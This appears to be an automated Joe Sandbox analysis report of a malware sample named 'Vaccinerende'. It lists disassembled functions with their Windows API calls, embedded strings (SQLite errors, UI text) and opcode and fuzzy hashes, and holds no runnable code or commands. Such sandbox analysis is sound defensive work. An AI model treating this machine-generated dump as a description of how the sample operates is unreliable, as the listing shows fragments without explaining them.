                                                                              • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                              • _snwprintf.MSVCRT ref: 0040977D
                                                                              • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                              • String ID: Error$Error %d: %s
                                                                              • API String ID: 313946961-1552265934
                                                                              • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                              • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                              Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                              • API String ID: 0-1953309616
                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                              Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                              • API String ID: 3510742995-272990098
                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                              Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpymemset
                                                                              • String ID: gj
                                                                              • API String ID: 1297977491-4203073231
                                                                              • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                              • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                              Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@$free
                                                                              • String ID:
                                                                              • API String ID: 2241099983-0
                                                                              • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                              • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                              Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                              • malloc.MSVCRT ref: 004174BD
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                              • free.MSVCRT ref: 004174E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                              • String ID:
                                                                              • API String ID: 4053608372-0
                                                                              • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                              • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                              Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                              • String ID:
                                                                              • API String ID: 4247780290-0
                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                              Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                              • memset.MSVCRT ref: 004450CD
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                              • String ID:
                                                                              • API String ID: 1471605966-0
                                                                              • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                              • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                              Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                              • String ID: \StringFileInfo\
                                                                              • API String ID: 102104167-2245444037
                                                                              • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                              • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                              Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@
                                                                              • String ID:
                                                                              • API String ID: 613200358-0
                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                              Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                              • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                              • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$PlacementWindow
                                                                              • String ID: AE
                                                                              • API String ID: 3548547718-685266089
                                                                              • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                              • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                              • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                              • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                              Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _memicmpwcslen
                                                                              • String ID: @@@@$History
                                                                              • API String ID: 1872909662-685208920
                                                                              • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                              • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                              Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004100FB
                                                                              • memset.MSVCRT ref: 00410112
                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                              • String ID: </%s>
                                                                              • API String ID: 3400436232-259020660
                                                                              • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                              • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                              Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040E770
                                                                              • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendmemset
                                                                              • String ID: AE$"
                                                                              • API String ID: 568519121-1989281832
                                                                              • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                              • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                              Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040D58D
                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                              • String ID: caption
                                                                              • API String ID: 1523050162-4135340389
                                                                              • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                              • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                              Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                              • String ID: MS Sans Serif
                                                                              • API String ID: 210187428-168460110
                                                                              • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                              • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                              Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
